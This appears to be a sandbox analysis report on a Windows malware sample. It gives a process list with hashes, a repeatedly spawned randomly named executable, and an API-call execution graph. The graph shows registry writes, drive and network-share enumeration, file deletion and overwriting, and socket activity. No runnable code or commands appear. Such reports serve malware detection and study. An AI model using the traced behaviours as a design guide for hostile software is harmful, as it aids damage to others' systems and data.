                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:21
                                                                                                          Start time:05:42:51
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\smartscreen.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                          Imagebase:0x7ff7d45b0000
                                                                                                          File size:2'378'752 bytes
                                                                                                          MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:22
                                                                                                          Start time:05:42:52
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
                                                                                                          Imagebase:0x7ff794e20000
                                                                                                          File size:19'232 bytes
                                                                                                          MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:23
                                                                                                          Start time:05:42:54
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:24
                                                                                                          Start time:05:42:56
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:25
                                                                                                          Start time:05:42:56
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\ApplicationFrameHost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                          Imagebase:0x7ff7d5d50000
                                                                                                          File size:78'456 bytes
                                                                                                          MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:26
                                                                                                          Start time:05:42:59
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
                                                                                                          Imagebase:0x7ff63cc40000
                                                                                                          File size:19'456 bytes
                                                                                                          MD5 hash:6C44453CD661FC2DB18E4C09C4940399
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:27
                                                                                                          Start time:05:42:59
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:28
                                                                                                          Start time:05:43:00
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                          Imagebase:0x7ff614e70000
                                                                                                          File size:98'104 bytes
                                                                                                          MD5 hash:3CD3CD85226FCF576DFE9B70B6DA2630
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:29
                                                                                                          Start time:05:43:05
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Imagebase: 0x7ff69a060000  File size: 57'856 bytes
MD5: BCE744909EB87F293A85830D02B3D6EB
Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Target ID 30  Start: 05:43:05 26/11/2024
  Path: C:\Windows\System32\svchost.exe  (Wow64: false)
  Commandline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup
  Imagebase: 0x7ff6eef20000  File size: 55'320 bytes
  MD5: B7F884C1B74A263F746EE12A5F7C9F6A
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Target ID 31  Start: 05:43:06 26/11/2024
  Path: C:\Windows\System32\dllhost.exe  (Wow64: false)
  Commandline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  Imagebase: 0x7ff70f330000  File size: 21'312 bytes
  MD5: 08EB78E5BE019DF044C26B14703BD1FA
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Target ID 32  Start: 05:43:07 26/11/2024
  Path: C:\Windows\System32\conhost.exe  (Wow64: false)
  Commandline: C:\Windows\system32\conhost.exe 0x4
  Imagebase: 0x7ff7699e0000  File size: 862'208 bytes
  MD5: 0D698AF330FD17BEE3BF90011D49251D
  Elevated: true  Administrator: true  Programmed in: C, C++ or other language  Exited: false

Target ID 33  Start: 05:43:07 26/11/2024
  Path: C:\Windows\System32\RuntimeBroker.exe  (Wow64: false)
  Commandline: C:\Windows\System32\RuntimeBroker.exe -Embedding
  Imagebase: 0x7ff71e800000  File size: 103'288 bytes
  MD5: BA4CFE6461AFA1004C52F19C8F2169DC
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: true

Target ID 34  Start: 05:43:08 26/11/2024
  Path: C:\Windows\System32\RuntimeBroker.exe  (Wow64: false)
  Commandline: C:\Windows\System32\RuntimeBroker.exe -Embedding
  Imagebase: 0x7ff71e800000  File size: 103'288 bytes
  MD5: BA4CFE6461AFA1004C52F19C8F2169DC
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Target ID 35  Start: 05:43:08 26/11/2024
  Path: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe  (Wow64: true)
  Commandline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
  Imagebase: 0xa60000  File size: 140'800 bytes
  MD5: 32B8AD6ECA9094891E792631BAEA9717
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Target ID 36  Start: 05:43:08 26/11/2024
  Path: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe  (Wow64: true)
  Commandline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
  Imagebase: 0xa60000  File size: 140'800 bytes
  MD5: 32B8AD6ECA9094891E792631BAEA9717
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Target ID 37  Start: 05:43:09 26/11/2024
  Path: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe  (Wow64: true)
  Commandline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
  Imagebase: 0xa60000  File size: 140'800 bytes
  MD5: 32B8AD6ECA9094891E792631BAEA9717
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Target ID 38  Start: 05:43:09 26/11/2024
  Path: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe  (Wow64: true)
  Commandline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
  Imagebase: 0xa60000  File size: 140'800 bytes
  MD5: 32B8AD6ECA9094891E792631BAEA9717
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Target ID 39  Start: 05:43:09 26/11/2024
  Path: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe  (Wow64: true)
  Commandline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
  Imagebase: 0xa60000  File size: 140'800 bytes
  MD5: 32B8AD6ECA9094891E792631BAEA9717
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Target ID 40  Start: 05:43:10 26/11/2024
  Path: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe  (Wow64: true)
  Commandline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
  Imagebase: 0xa60000  File size: 140'800 bytes
  MD5: 32B8AD6ECA9094891E792631BAEA9717
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Target ID 41  Start: 05:43:10 26/11/2024
  Path: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe  (Wow64: true)
  Commandline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
  Imagebase: 0xa60000  File size: 140'800 bytes
  MD5: 32B8AD6ECA9094891E792631BAEA9717
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Target ID 42  Start: 05:43:10 26/11/2024
  Path: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe  (Wow64: true)
  Commandline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe"
  Imagebase: 0xa60000  File size: 140'800 bytes
  MD5: 32B8AD6ECA9094891E792631BAEA9717
  Elevated: false  Administrator: false  Programmed in: C, C++ or other language  Exited: false

Execution Graph

Execution Coverage: 19.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 18.8%
Total number of Nodes: 1901
Total number of Limit Nodes: 56

execution_graph (the graph viewer's raw node/edge dump, restructured here by entry address; each API name is listed once per subgraph, nodes tagged __common_dcos_data (shared library code) and "N API calls" placeholders for collapsed subgraphs are omitted; the dump breaks off at 0x40412b)

0x97f013 -> 0x97d3ac -> 0x97d440 -> 0x97d765: LoadLibraryExA, GetModuleFileNameA, SetErrorMode, CreateFileMappingA, MapViewOfFile, GetProcAddress, CreateMutexA, GetLastError, Sleep, ExitProcess
0x40371b: LoadLibraryExA, GetModuleFileNameA, SetErrorMode, CreateFileMappingA, MapViewOfFile, GetProcAddress, CreateMutexA, GetLastError, CreateThread, Sleep, ExitProcess; thread routine 0x403de7: CreateMutexA, VirtualAlloc, LoadLibraryExA
0x987ac0: LoadLibraryA, GetProcAddress, VirtualProtect (twice), ExitProcess
0x4012e0 (CRT entry of the host program): _controlfp, __set_app_type, __getmainargs, fopen, fread, ferror, printf, fprintf, fclose, exit
0x9031f9 / 0x9033df: Sleep, GetLogicalDrives, GetDriveTypeA, lstrcat, lstrcpy, lstrlen, CreateFileA, GetFileTime, FileTimeToSystemTime, ReadFile, CharLowerA, GetFileAttributesA, SetFileAttributesA, DeleteFileA, SHFileOperation, RemoveDirectoryA, GetSystemTime, SystemTimeToFileTime, WriteFile, CloseHandle, InterlockedExchange, RtlExitUserThread
0x901ab1 -> 0x901a5a: WNetEnumResourceA, WNetCloseEnum, GetLastError, lstrcpy, lstrcat, lstrlen, DeleteFileA, GlobalFree, Sleep
0x8ff8d6: InterlockedExchange, GetTickCount, GlobalAlloc, UnmapViewOfFile, SetFilePointer, SetEndOfFile, WriteFile, SetFileTime, SetFileAttributesA, DeleteFileA, CloseHandle, GlobalFree, RtlLeaveCriticalSection, Sleep
0x902c88: InterlockedExchange, lstrcpy, lstrcat, lstrlen, wsprintfA
0x8f511e: wsprintfA, RegQueryValueExA, RegCloseKey
0x8f4f36: wsprintfA, lstrcpy, lstrlen, RegSetValueExA, RegCloseKey, GlobalFree
0x8f7fca: select, recv
0x8f90ba: CreateFileA, WriteFile, CloseHandle
0x9024a1: CloseHandle, GetProcessHeap, HeapFree
0x9014a1: FindClose, Sleep
0x8fb22e: InterlockedExchange, GetTickCount
0x8fb3c9: InterlockedExchange
0x8f44b1: GetTickCount
0x8f8ec9: lstrcpyn
0x8f8dc4: RtlExitUserThread
0x404587: WideCharToMultiByte
0x97eb5f: _controlfp, exit
0x97eed8, 0x404b15: _controlfp, fclose, exit
0x404bc4: fopen; 0x404bd4: fclose; 0x404be4: fread; 0x404f4d: fclose; 0x404f65: ferror
9308->9305 9308->9310 9310->9305 9310->9308 9311 4041c0 KiUserExceptionDispatcher 9310->9311 9312 4041d3 9311->9312 9312->9310 9478 9008ce 9479 9008d8 9478->9479 9480 9008de GlobalFree 9479->9480 9481 9008ef RtlLeaveCriticalSection 9479->9481 9480->9481 9482 900915 9481->9482 9483 90090a Sleep 9481->9483 9483->9482 9605 8f5a6a 9606 8f5a82 9605->9606 9609 8f5ad0 wsprintfA RegQueryValueExA 9606->9609 9610 8f5b37 9606->9610 9607 8f5bf4 RegCloseKey 9608 8f5c01 9607->9608 9609->9610 9610->9607 9610->9608 9484 8f58e9 9489 8f5901 9484->9489 9485 8f5bf4 RegCloseKey 9486 8f5c01 9485->9486 9487 8f5962 wsprintfA 9488 8f5a01 RegSetValueExA 9487->9488 9487->9489 9488->9489 9489->9487 9489->9488 9490 8f5935 9489->9490 9490->9485 9490->9486 9685 8fd1e4 9686 8fd1f4 9685->9686 9687 8fd346 9686->9687 9688 8fd20e 9686->9688 9698 8f44cb InterlockedExchange 9686->9698 9699 8f44cb InterlockedExchange 9688->9699 9691 8fd232 9693 8fd273 9691->9693 9700 8f44cb InterlockedExchange 9691->9700 9692 8fc76b 2 API calls 9694 8fd298 9692->9694 9693->9692 9693->9694 9696 8fb3ef InterlockedExchange 9694->9696 9697 8fd336 9696->9697 9698->9688 9699->9691 9700->9693 9701 8f4bf9 9702 8f4c08 9701->9702 9703 8f4d68 RegCloseKey 9702->9703 9704 8f4c15 wsprintfA 9702->9704 9706 8f4d75 9703->9706 9705 8f4c60 9704->9705 9709 8f4c6d 9704->9709 9705->9709 9710 8f4cbc 9705->9710 9711 8f4ce5 9705->9711 9707 8f4d36 lstrlen RegSetValueExA 9714 8f4d63 9707->9714 9708 8f4d13 RegSetValueExA 9708->9714 9709->9707 9709->9708 9712 8f4a5b 2 API calls 9710->9712 9713 8f4a5b 2 API calls 9711->9713 9715 8f4cd2 lstrcpy 9712->9715 9716 8f4cf9 lstrcpy 9713->9716 9715->9709 9716->9709 7603 904567 SetErrorMode WSAStartup RtlInitializeCriticalSection RtlInitializeCriticalSection RtlInitializeCriticalSection 7626 903b60 7603->7626 7607 9045de CreateThread 7608 8f41c6 3 API calls 7607->7608 7927 8f9eea 7607->7927 7609 904605 CreateThread 7608->7609 7610 8f41c6 3 API calls 7609->7610 7901 90392d 7609->7901 7611 90462c CreateThread 
7610->7611 7612 8f41c6 3 API calls 7611->7612 7881 8f8962 Sleep 7611->7881 7613 904653 CreateThread 7612->7613 7614 8f41c6 3 API calls 7613->7614 7863 8fa2f5 7613->7863 7615 90467a CreateThread 7614->7615 7616 8f41c6 3 API calls 7615->7616 7857 8f426a 7615->7857 7617 9046a1 CreateThread 7616->7617 7618 8f41c6 3 API calls 7617->7618 8006 8f7a3a 7617->8006 7619 9046c8 CreateThread 7618->7619 7620 8f41c6 3 API calls 7619->7620 7994 8f83c9 socket 7619->7994 7621 9046ef CreateThread 7620->7621 7622 8f41c6 3 API calls 7621->7622 7981 8f878b Sleep 7621->7981 7623 904716 7622->7623 7624 904722 Sleep 7623->7624 7625 90472f 7623->7625 7624->7623 7627 903b8a 7626->7627 7701 902ebc RegOpenKeyExA 7627->7701 7630 903c72 LoadLibraryA 7632 903cf1 RegOpenKeyExA 7630->7632 7633 903c8e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7630->7633 7631 903c28 GetProcAddress GetProcAddress GetProcAddress 7631->7630 7634 903d15 RegSetValueExA RegCloseKey 7632->7634 7635 903d4d RegOpenKeyExA 7632->7635 7633->7632 7634->7635 7636 903d71 RegSetValueExA RegCloseKey 7635->7636 7637 903da9 lstrcpy lstrcat RegOpenKeyExA 7635->7637 7636->7637 7638 903df4 GetModuleFileNameA wsprintfA lstrlen RegSetValueExA RegCloseKey 7637->7638 7639 903e5f RegOpenKeyExA 7637->7639 7638->7639 7640 903f15 GetWindowsDirectoryA lstrlen 7639->7640 7641 903e87 RegSetValueExA RegSetValueExA RegSetValueExA RegCloseKey 7639->7641 7642 903f4c GetComputerNameA lstrlen 7640->7642 7643 903f3c lstrcat 7640->7643 7641->7640 7644 903fc9 lstrcpy GetUserNameA lstrlen 7642->7644 7645 903f7c lstrlen 7642->7645 7643->7642 7646 904009 lstrcpy 7644->7646 7649 90401d 7644->7649 7645->7644 7646->7649 7647 90404e lstrlen 7648 9040e1 7647->7648 7647->7649 7709 900b9a lstrcpy GetTickCount lstrlen wsprintfA CreateFileA 7648->7709 7649->7647 7649->7648 7651 9040aa lstrlen 7649->7651 7651->7649 7653 9040f2 GetTempPathA lstrlen 7655 904129 7653->7655 7656 904119 lstrcat 7653->7656 7654 90414d lstrcpy 7661 90414b 7654->7661 7658 
900b9a 7 API calls 7655->7658 7656->7655 7657 904178 lstrlen 7659 904205 lstrcat CreateFileMappingA 7657->7659 7657->7661 7660 904133 7658->7660 7662 90423a 7659->7662 7660->7661 7663 90413a lstrcpy 7660->7663 7661->7657 7661->7659 7664 9041db lstrlen 7661->7664 7712 8f6274 CreateFileMappingA 7662->7712 7663->7661 7664->7661 7668 904246 7669 904331 7668->7669 7670 904256 7668->7670 7672 8f5760 10 API calls 7669->7672 7732 8fc89a 7670->7732 7674 90432c 7672->7674 7673 90431e 7676 8f5760 10 API calls 7673->7676 7738 8f4d96 7674->7738 7675 90428e 7675->7673 7678 90429d 7675->7678 7676->7674 7678->7675 7789 8f5e86 7678->7789 7679 90434a 7772 8f55be CreateFileA 7679->7772 7683 904361 7783 8fa553 GetTickCount GetPrivateProfileStringA lstrlen 7683->7783 7684 904366 7686 904397 7684->7686 7690 9043c6 7684->7690 7795 8f44cb InterlockedExchange 7686->7795 7688 90439c GetTickCount wsprintfA 7688->7690 7689 9044aa lstrcat GetSystemDirectoryA lstrlen 7691 9044f5 lstrcat lstrcat GlobalAlloc GlobalAlloc 7689->7691 7692 9044e5 lstrcat 7689->7692 7690->7689 7694 904461 lstrlen wsprintfA 7690->7694 7693 904556 CreateThread 7691->7693 7692->7691 7696 8f41c6 RtlEnterCriticalSection 7693->7696 7972 9027d4 GlobalAlloc 7693->7972 7694->7690 7695 9044a3 7694->7695 7695->7689 7697 8f4229 7696->7697 7700 8f41e2 7696->7700 7698 8f425b RtlLeaveCriticalSection 7697->7698 7699 8f423c CloseHandle 7697->7699 7698->7607 7699->7698 7700->7698 7702 902f0d RegSetValueExA RegCloseKey 7701->7702 7706 902f44 7701->7706 7702->7706 7703 902f8b lstrcpy lstrcat 7708 902fbe 7703->7708 7705 902ffa LoadLibraryA 7705->7630 7705->7631 7706->7703 7796 902e32 RegOpenKeyExA 7706->7796 7707 902e32 6 API calls 7707->7708 7708->7705 7708->7707 7710 900c23 CloseHandle DeleteFileA 7709->7710 7711 900c44 7709->7711 7710->7711 7711->7653 7711->7654 7713 8f62bc MapViewOfFile 7712->7713 7714 8f62d9 7712->7714 7713->7714 7715 8f5760 7714->7715 7716 8f57ec 7715->7716 7717 8f57e3 7715->7717 7716->7668 7717->7716 7718 8f57f1 
lstrcpy RegOpenKeyExA 7717->7718 7719 8f5827 7718->7719 7720 8f5854 7718->7720 7719->7716 7721 8f5832 RegCreateKeyA 7719->7721 7722 8f5a4b 7720->7722 7724 8f585e 7720->7724 7721->7716 7721->7720 7727 8f5ad0 wsprintfA RegQueryValueExA 7722->7727 7728 8f5935 7722->7728 7723 8f5872 RegEnumValueA 7723->7724 7731 8f58ab 7723->7731 7724->7723 7725 8f58ad RegDeleteValueA 7724->7725 7724->7731 7725->7723 7726 8f5bf4 RegCloseKey 7726->7716 7727->7728 7728->7716 7728->7726 7729 8f5962 wsprintfA 7730 8f5a01 RegSetValueExA 7729->7730 7729->7731 7730->7731 7731->7728 7731->7729 7731->7730 7733 8fc8b7 7732->7733 7734 8fc906 7732->7734 7733->7734 7735 8fc8c0 MapViewOfFile 7733->7735 7734->7675 7735->7734 7736 8fc8e0 7735->7736 7737 8fc8f2 UnmapViewOfFile 7736->7737 7737->7734 7739 8f4dc0 7738->7739 7740 8f4e41 lstrcpy lstrlen wsprintfA RegOpenKeyExA 7739->7740 7750 8f4e3c 7739->7750 7741 8f4eb7 RegCreateKeyA 7740->7741 7742 8f5112 7740->7742 7743 8f4ee0 GlobalAlloc 7741->7743 7741->7750 7745 8f513a wsprintfA 7742->7745 7769 8f519e 7742->7769 7744 8fc89a 2 API calls 7743->7744 7746 8f4eff 7744->7746 7747 8f5165 RegQueryValueExA 7745->7747 7748 8f51a0 RegQueryValueExA 7745->7748 7751 8f4f1a 7746->7751 7801 8f6330 7746->7801 7752 8f5199 7747->7752 7747->7769 7748->7769 7749 8f5433 RegCloseKey 7749->7750 7750->7679 7755 8f5085 RegCloseKey 7751->7755 7756 8f4f52 wsprintfA 7751->7756 7757 8f50d2 7751->7757 7752->7679 7754 8f50f9 GlobalFree 7754->7750 7755->7757 7758 8f4f9c 7756->7758 7759 8f4fa9 7756->7759 7757->7750 7757->7754 7758->7759 7760 8f5007 7758->7760 7761 8f4fe5 7758->7761 7758->7769 7762 8f5053 lstrlen RegSetValueExA 7759->7762 7763 8f5030 RegSetValueExA 7759->7763 7765 8f4a5b 2 API calls 7760->7765 7825 8f4a5b 7761->7825 7766 8f5080 7762->7766 7763->7766 7768 8f5016 lstrcpy 7765->7768 7766->7679 7768->7759 7770 8f6330 32 API calls 7769->7770 7771 8f5403 7769->7771 7770->7771 7771->7749 7771->7750 7773 8f572b 7772->7773 7774 8f5650 GetFileSize 7772->7774 7777 8f6330 32 API 
calls 7773->7777 7781 8f5742 7773->7781 7775 8f571e CloseHandle 7774->7775 7776 8f5672 7774->7776 7775->7773 7776->7775 7780 8f5682 GlobalAlloc ReadFile lstrcpy lstrlen 7776->7780 7777->7781 7778 8f574e GlobalFree 7779 8f575b lstrlen 7778->7779 7779->7683 7779->7684 7782 8f56f4 7780->7782 7781->7778 7781->7779 7782->7775 7784 8fa660 lstrcpy 7783->7784 7785 8fa5e0 GetTickCount 7783->7785 7784->7684 7786 8fa5ff 7785->7786 7856 8f44cb InterlockedExchange 7786->7856 7788 8fa613 wsprintfA WritePrivateProfileStringA 7788->7784 7790 8f5eb2 7789->7790 7792 8f5ebb 7789->7792 7791 8f5f2b GetTickCount 7790->7791 7790->7792 7793 8f5f0f 7790->7793 7791->7793 7792->7678 7793->7792 7794 8f6056 GetTickCount 7793->7794 7794->7792 7795->7688 7797 902e80 RegCreateKeyA 7796->7797 7798 902e5c RegSetValueExA RegCloseKey 7796->7798 7799 902eb8 7797->7799 7800 902e96 RegSetValueExA RegCloseKey 7797->7800 7798->7799 7799->7706 7800->7799 7829 908060 7801->7829 7804 8f672a 7805 8f695b RtlLeaveCriticalSection 7804->7805 7806 8f6734 IsBadWritePtr 7804->7806 7807 8f697c 7805->7807 7806->7805 7808 8f674f 7806->7808 7807->7751 7808->7805 7809 8f678e wsprintfA lstrlen 7808->7809 7810 8f67ca 7809->7810 7810->7805 7811 8f6868 GlobalFree 7810->7811 7812 8f6875 GlobalAlloc 7810->7812 7811->7812 7813 8f68a7 7812->7813 7814 8f68bf GlobalAlloc wsprintfA lstrlen 7813->7814 7815 8f68b3 GlobalFree 7813->7815 7818 8f6914 7814->7818 7815->7814 7816 8f63dd 7817 8f6412 7816->7817 7819 8f6698 7816->7819 7821 8f6623 lstrcpy 7816->7821 7851 8f54a2 CreateFileA 7818->7851 7820 8f66a1 7819->7820 7831 8f4af0 7819->7831 7820->7805 7821->7816 7828 8f4a68 7825->7828 7826 8f4ae5 lstrcpy 7826->7759 7827 8f4ab2 lstrlen wsprintfA 7827->7828 7828->7826 7828->7827 7830 8f633d RtlEnterCriticalSection 7829->7830 7830->7804 7830->7816 7832 8f4afd 7831->7832 7833 8f4b5b 7832->7833 7834 8f4b60 lstrcpy lstrlen wsprintfA RegOpenKeyExA 7832->7834 7833->7820 7835 8f4bcb RegCreateKeyA 7834->7835 7837 8f4bed 7834->7837 7836 8f4be8 
7835->7836 7835->7837 7836->7833 7838 8f4d68 RegCloseKey 7837->7838 7839 8f4c15 wsprintfA 7837->7839 7838->7833 7840 8f4c6d 7839->7840 7841 8f4c60 7839->7841 7842 8f4d36 lstrlen RegSetValueExA 7840->7842 7843 8f4d13 RegSetValueExA 7840->7843 7841->7840 7844 8f4cbc 7841->7844 7845 8f4ce5 7841->7845 7848 8f4d63 7842->7848 7843->7848 7846 8f4a5b 2 API calls 7844->7846 7847 8f4a5b 2 API calls 7845->7847 7849 8f4cd2 lstrcpy 7846->7849 7850 8f4cf9 lstrcpy 7847->7850 7848->7820 7849->7840 7850->7840 7852 8f55b9 7851->7852 7853 8f5520 lstrcpy lstrlen 7851->7853 7852->7805 7854 8f5561 7853->7854 7855 8f557b WriteFile SetEndOfFile CloseHandle 7854->7855 7855->7852 7856->7788 7860 8f4275 7857->7860 7858 8f42dc RtlExitUserThread 7859 8f42cf Sleep 7859->7860 7860->7858 7860->7859 7861 8f42a6 WaitForSingleObject 7860->7861 7862 8f41c6 3 API calls 7860->7862 7861->7860 7862->7860 8020 8f44cb InterlockedExchange 7863->8020 7865 8fa360 Sleep GetTempPathA lstrlen 7866 8fa3b8 7865->7866 7867 8fa3a6 lstrcat 7865->7867 7868 8fa3c5 lstrlen lstrcpy lstrcat 7866->7868 7869 8fa542 RtlExitUserThread 7866->7869 7870 8fa411 FindFirstFileA 7866->7870 7872 8fa525 FindClose 7866->7872 7873 8fa532 Sleep 7866->7873 7867->7866 7868->7866 7870->7866 7871 8fa43b FindNextFileA 7870->7871 7871->7866 7874 8fa457 lstrcat lstrlen lstrlen 7871->7874 7872->7873 7873->7866 7875 8fa49e lstrcmpiA 7874->7875 7879 8fa4b9 7874->7879 7875->7879 7876 8fa50c Sleep 7876->7871 7878 8fa4e3 lstrcmpiA 7878->7876 7878->7879 7879->7876 7879->7878 8021 8fa26e 7879->8021 8027 8fa2ad SHFileOperation RemoveDirectoryA 7879->8027 8618 8f44cb InterlockedExchange 7881->8618 7883 8f8a1f Sleep 7892 8f8a39 7883->7892 7884 8f8db5 RtlExitUserThread 7885 8f8bab Sleep 7885->7892 7887 8f8d8d Sleep 7887->7892 7888 8f8da5 Sleep 7888->7892 7889 8f8cae lstrcpy 7889->7892 7890 8f8b2a IsBadWritePtr 7890->7892 7895 8f8b48 7890->7895 7891 8fa75a 10 API calls 7891->7895 7892->7884 7892->7885 7892->7887 7892->7888 7892->7889 7892->7890 7899 8f8d47 
